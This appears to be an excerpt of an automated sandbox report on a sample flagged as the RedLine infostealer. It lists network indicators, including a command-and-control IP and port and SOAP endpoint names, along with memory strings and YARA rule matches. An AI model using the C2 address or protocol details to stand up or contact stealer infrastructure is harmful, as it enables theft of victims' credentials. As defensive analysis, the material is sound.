                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.76
                  Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.76:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.000000000305C000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.76:5
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.76:55615
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.76:55615/
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.76:55615t-
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: nzLoHpgAln.exe, 00000000.00000002.1751633310.0000000002732000.00000004.00000800.00020000.00000000.sdmp, nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1849378613.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                  Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.000000000305C000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                  Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.00000000032D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.00000000032D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                  Source: nzLoHpgAln.exe, nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                  Source: nzLoHpgAln.exe, nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                  Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: nzLoHpgAln.exe, nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                  Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                  System Summary

                  barindex
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008107D4 NtQueryInformationProcess,0_2_008107D4
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB07D4 NtQueryInformationProcess,10_2_00FB07D4
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008128200_2_00812820
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008114D00_2_008114D0
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_00811DA00_2_00811DA0
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_00819D280_2_00819D28
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008186A90_2_008186A9
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008158A90_2_008158A9
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008158B80_2_008158B8
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008108D10_2_008108D1
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008189600_2_00818960
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008189700_2_00818970
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_00815AF00_2_00815AF0
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_00815D800_2_00815D80
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008146A90_2_008146A9
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008146B80_2_008146B8
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008117D00_2_008117D0
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_00815F500_2_00815F50
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_048FA41A0_2_048FA41A
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_048FA4280_2_048FA428
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_048F847C0_2_048F847C
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09C320300_2_09C32030
